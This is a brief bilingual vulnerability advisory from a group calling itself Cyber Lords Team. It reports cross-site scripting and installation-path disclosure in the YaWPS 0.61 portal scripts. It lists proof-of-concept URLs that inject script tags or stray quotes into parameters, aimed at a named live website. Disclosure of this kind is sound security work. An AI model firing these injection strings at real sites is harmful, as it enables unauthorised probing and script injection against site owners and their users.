Advisory: XSS in YaWPS 0.61
Home Page: http://yawps.sourceforge.net/
Уязвимость/Vulnerability:
Межсайтовый скриптинг/Cross Site Scripting
Уязвимый скрипт/Vulnerable script: topics.cgi, forum.cgi
http://www.karadesign.com/cgi-bin/yawps/topics.cgi?op=view_cat;cat=graphics"><script>alert()</script><"
http://www.karadesign.com/cgi-bin/yawps/forum.cgi?op=view_board;board=test"><script>alert()</script><"
http://www.karadesign.com/cgi-bin/yawps/forum.cgi?op=post;board=test;thread=2"><script>alert()</script><";start=2;quote=
Раскрытие установочного пути/Exposure of installation path:
Уязвимый скрипт/Vulnerable script: polls.cgi, forum.cgi
http://www.karadesign.com/cgi-bin/yawps/polls.cgi?op=view_poll;id=1'
http://www.karadesign.com/cgi-bin/yawps/forum.cgi?op=view_board;board=test'
http://www.karadesign.com/cgi-bin/yawps/forum.cgi?op=post;board=test;thread=2';start=2;quote=
Cyber Lords Team
www.cyberlords.net